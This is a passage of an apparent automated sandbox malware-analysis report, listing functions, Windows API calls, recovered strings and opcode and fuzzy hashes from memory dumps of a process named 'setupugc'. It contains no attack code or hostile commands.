                • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                • Instruction ID: 3c32e87e57c7868f42c303e460aeea92310c45f79f1c966ac8e828cc92b52067
                • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                • Instruction Fuzzy Hash: 8DE06D712003047BD610EE59DC45FAB37ACEFC5710F004408FD08A7282D670B91486B5
                Function 00D09630 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,00CF3CF2,000000F4), ref: 00D0966C
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                • Instruction ID: 47598f2c2f9c8f7ed84ce5182b54d30005eb9676fb4d55a6fa1a7216e7a66a78
                • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                • Instruction Fuzzy Hash: 7BE039B22006047BD610EA59DC45F9B77ACEBC4710F008409F908A7281DA31B9108BB4
                Function 00CF82B0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNEL32(?), ref: 00CF82DC
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 70bb55df6e06c9865b5c9752df4751d0a4ddc1d1fc42b2deb0a52a0e7238c953
                • Instruction ID: 0c133e3dddb3b0ed265d8907ab092f0dc4b62636c3d36927535bf81981619dab
                • Opcode Fuzzy Hash: 70bb55df6e06c9865b5c9752df4751d0a4ddc1d1fc42b2deb0a52a0e7238c953
                • Instruction Fuzzy Hash: 6CE0807514070817F72466A8DC45FB5335C9B44724F144550FE2CDB1C5E9B4FA018179
                Function 00CF82A9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNEL32(?), ref: 00CF82DC
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                • Instruction ID: cbe9758b0ef732d97d549f73fd8f596baa3f9c07c597e2407b52d108a0d6bcfe
                • Opcode Fuzzy Hash: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                • Instruction Fuzzy Hash: 8DE0207944070417E71016A49E477FA3218AF04320F1C0654FD78DB1C7D56CEA468339
                Function 00CF8098 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00008003,?,?,00CF1C60,00D07EEF,00D055AF,00CF1C30), ref: 00CF80D3
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                • Instruction ID: 8301b99ca539432d9bb499cbe58c27794c616a9358473f811d6657776ee07549
                • Opcode Fuzzy Hash: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                • Instruction Fuzzy Hash: 4DE0C77A2802002BF311AAA98C03F5A328C8B54360F454428BE0CDB3C2EE60EA0282A1
                Function 00CF80A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00008003,?,?,00CF1C60,00D07EEF,00D055AF,00CF1C30), ref: 00CF80D3
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                • Instruction ID: b9870df808a16e9d9f83fc843cb14396dabce26315447bed32e7bfef3535ec40
                • Opcode Fuzzy Hash: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                • Instruction Fuzzy Hash: 93D05E766803043BF651A7E59C17F5A328C8B54764F054068BE0CD72C2ED64E6018175
                Function 00CF834E Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNEL32(?), ref: 00CF82DC
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                • Instruction ID: 3cfe5853b239205787d75d437d804a4bfb3d7dcc1a762f7d4bf6ff192e2d9d89
                • Opcode Fuzzy Hash: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                • Instruction Fuzzy Hash: 70D0973521180804E7201AACB4083FA7344EB073387000900E938CE9D8C623B4CE400A
                Function 036A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 88b011a40f7760b64bd403df16285e51dc6ecc40ae4eaa795fc3e4c39ec77b1d
                • Instruction ID: 9f6a6176610fa0dc8021a7162849246be0f09923162e2ca8c1c7fa3bbba52ca3
                • Opcode Fuzzy Hash: 88b011a40f7760b64bd403df16285e51dc6ecc40ae4eaa795fc3e4c39ec77b1d
                • Instruction Fuzzy Hash: D6B09B719419C5C5DA51E7644B08717791467D1701F19C461D2030751F4779C5D1EA75

                Non-executed Functions

                Function 0348E089 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378682288.0000000003480000.00000040.00000800.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3480000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                • API String ID: 0-3558027158
                • Opcode ID: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                • Instruction ID: e7d41faa10a3687649a14afd686bfef3959439dc09a4403767a65c3b03e845e9
                • Opcode Fuzzy Hash: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                • Instruction Fuzzy Hash: D89171F04482988AC7158F55A0612AFFFB1EBC6304F15816DE7E6BB243C3BE8945CB85
                Function 03483BD1 Relevance: 18.8, Strings: 15, Instructions: 51COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378682288.0000000003480000.00000040.00000800.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3480000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: .$9~b{$<9<-$bsnb$b{z=$g+&8$g+&8$n{z-$n{z:$qs9a$stf:$wffz$wqs9$x9n~$z:wf
                • API String ID: 0-3228068659
                • Opcode ID: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                • Instruction ID: a7cc8c61598c5d38ded4f7dc06fde7618693d54539da21706387e57559828781
                • Opcode Fuzzy Hash: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                • Instruction Fuzzy Hash: 042144B081468C8ADF14DF86D991AEDBF71FB10348F208109D4446F3A4D7781A42CF8A
                Function 036A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 3dd17f60b600405780a141e2ce03d762638b2ee35af883a0a85e1d13d91d650e
                • Instruction ID: 5c5ef37b2e2ca5c4c3146be46e3eee1db65c01813297757cac703c8e00e36d2c
                • Opcode Fuzzy Hash: 3dd17f60b600405780a141e2ce03d762638b2ee35af883a0a85e1d13d91d650e
                • Instruction Fuzzy Hash: 8B51E5B6E04616AFCB10DF9DC9A097EFBB8BB08600B148669E465D7741D334DE448FA0
                Function 03712410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: fc5210c6ee8346e61ca132d1af1c7cc773cb8d82b0152ffee3c4889355cc24a3
                • Instruction ID: cffe9d94e0b7595251b2e82b53140f6dc58f9689acf4f94acb05f34d1981473d
                • Opcode Fuzzy Hash: fc5210c6ee8346e61ca132d1af1c7cc773cb8d82b0152ffee3c4889355cc24a3
                • Instruction Fuzzy Hash: B7512876B00645AECB30DF9CC89097FBBFDEB44200B1488A9E896D7646E774DE50DB60
                Function 03697630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                Download Yara Rule
                Strings
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 036D4787
                • Execute=1, xrefs: 036D4713
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036D4725
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036D46FC
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036D4655
                • ExecuteOptions, xrefs: 036D46A0
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036D4742
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: 6041509ca6f647cf3f6c498d193948638925adfa5d976faba183714d78ba4b0b
                • Instruction ID: 4dc5d1e6be5eec0b556aaaa4a2ee96b217a3d691a07d9ccf4e280adbd4d321fb
                • Opcode Fuzzy Hash: 6041509ca6f647cf3f6c498d193948638925adfa5d976faba183714d78ba4b0b
                • Instruction Fuzzy Hash: 51511635A003196AEF11EFA9DD89BAE77ACEF45300F0800EAD505AF281EB719E558F54
                Function 036AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: dca71aad2688ae1d8497f282aeba0b8c0e981b2131b7987664e3a2e4191a295c
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: E281CC30E05A499EDF28CE6CCA917FEBBB2AF45320F1C425AD861A7391C7708C518F64
                Function 037120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: aa5249cf52af6a06d33abb5fa061f0d002e12e9877afb7d4bcdea1e24c27ae7b
                • Instruction ID: 9be4c05adad71d62e51d96f51224f6b12f7a5d18ee36cff19a01488a0a447ff3
                • Opcode Fuzzy Hash: aa5249cf52af6a06d33abb5fa061f0d002e12e9877afb7d4bcdea1e24c27ae7b
                • Instruction Fuzzy Hash: DB21517BE00219ABCB50DF6DCC40AEEBBF9EF54640F18052AE905E7201E770DA119BA1
                Function 0368F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                Download Yara Rule
                Strings
                • RTL: Re-Waiting, xrefs: 036D031E
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036D02BD
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036D02E7
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: 8e5dc8281a66759ade1971741e2e29f5f7ce296b01c6213ecad949f47772183f
                • Instruction ID: 7e151d4629826baa980ef44334fda46804ef41da1981323b83414ac5faa3b0d8
                • Opcode Fuzzy Hash: 8e5dc8281a66759ade1971741e2e29f5f7ce296b01c6213ecad949f47772183f
                • Instruction Fuzzy Hash: FCE1BB70A087419FD725DF28D984B2ABBE0BB88324F180B6DF5A58B3E1D774D845CB52
                Function 0369BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                Download Yara Rule
                Strings
                • RTL: Resource at %p, xrefs: 036D7B8E
                • RTL: Re-Waiting, xrefs: 036D7BAC
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036D7B7F
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: 827310eceeffccf7a3ae9e5ec109b2f528037e7fcd86d01bad26062b5b63e277
                • Instruction ID: f668fea4dc961372fe7832a3d7e3c321d93328eb7aa9b312a03836c47fc6851f
                • Opcode Fuzzy Hash: 827310eceeffccf7a3ae9e5ec109b2f528037e7fcd86d01bad26062b5b63e277
                • Instruction Fuzzy Hash: 444124357017029FEB24DE28D940B6BB7E9EF88710F040A1EF85ADB780DB71E8058B95
                Function 0369B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036D728C
                Strings
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036D7294
                • RTL: Resource at %p, xrefs: 036D72A3
                • RTL: Re-Waiting, xrefs: 036D72C1
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: a249e5823c2a2b2a875af9609f7fca04fd25ee277a63c730d3d985a890df6df1
                • Instruction ID: c90ff5dea4af749e7804a2a216cc1a0da53ccc137b9f709c9771cbf532795e85
                • Opcode Fuzzy Hash: a249e5823c2a2b2a875af9609f7fca04fd25ee277a63c730d3d985a890df6df1
                • Instruction Fuzzy Hash: DF410335B00346AFDB20DE24DD41B6AB7A9FF84B10F14061AF955EF340DB21E8469BE9
                Function 03712300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: 46dce003950a8fbd77092cf1d11aa1feba3785555d0f5f072e5307beac0c6757
                • Instruction ID: cc1dbe9d2cbfbbbdd27015d0219e184f485fd4e97609758d96d2ff0b6fe0776a
                • Opcode Fuzzy Hash: 46dce003950a8fbd77092cf1d11aa1feba3785555d0f5f072e5307beac0c6757
                • Instruction Fuzzy Hash: 0D316677A00619AFCB24DF2DCC40BEEB7B8EB48650F544559E849E7241EB30EA558FA0
                Function 036A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: b3913806044b8a81116fa04a211e67c2c179adad00e6019132985e002fca0cd6
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 21918270E00A1A9ADF24DFADC9816BEB7A5BF44720F18455AE865E73C0D7309E418F64
                Function 03669126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: c53de87e9b17cdeb85b1d7a5ed1c2359eb4b6ec98e9b921fb2c061a06bccf809
                • Instruction ID: c9770dda3fb35970ac291de18f3e520bde3ebf90f0ee63ff87aa8d3756436ccb
                • Opcode Fuzzy Hash: c53de87e9b17cdeb85b1d7a5ed1c2359eb4b6ec98e9b921fb2c061a06bccf809
                • Instruction Fuzzy Hash: 82815A75D002699BDB21DF54CD44BEEBBB8AF08750F0445EAE909B7280E7709E85CFA4
                Function 036ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                Download Yara Rule
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 036ECFBD
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: 96127acd0ad0f60a5be77cd1165e9dc77e74261537597194006fb61bc33290a2
                • Instruction ID: 4345a5e38f334dee6189df6b22c83f3b3674b5b328228b3aee3ceee03a448657
                • Opcode Fuzzy Hash: 96127acd0ad0f60a5be77cd1165e9dc77e74261537597194006fb61bc33290a2
                • Instruction Fuzzy Hash: AD4188B99012189FDB21DFA8C940AAEBBB8FF45B00F08442EE915DB264D774C845CB65